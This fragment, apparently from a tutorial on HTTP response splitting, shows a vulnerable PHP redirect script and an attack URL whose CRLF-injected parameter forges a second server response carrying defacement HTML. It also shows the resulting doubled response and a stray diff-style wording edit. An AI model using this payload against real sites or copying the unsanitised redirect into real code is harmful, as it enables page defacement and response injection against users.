 rezos@spin ~/public_html $ cat redir.php <?php header ("Location: " . $_GET['page']); ?>

 /redir.php?page=http://other.testsite.com%0d%0aContent- Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent- Type:%20text/html%0d%0aContent- Length:%2019%0d%0a%0d%0a<html>deface</html>

 HTTP server will respond with two (not one!) following headers:

 HTTP/1.1 302 Moved Temporarily Date: Wed, 24 Dec 2003 15:26:41 GMT Location: http://testsite.com/redir.php?page=http://other.testsite.com Content-Length: 0

 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 19 <html>deface</html>

-the response #2 will be send to him as an answer to his request.
+the response 2 will be sent to them as an answer to their request.

 This way it was possible to replace the web page, which was served to the specified user.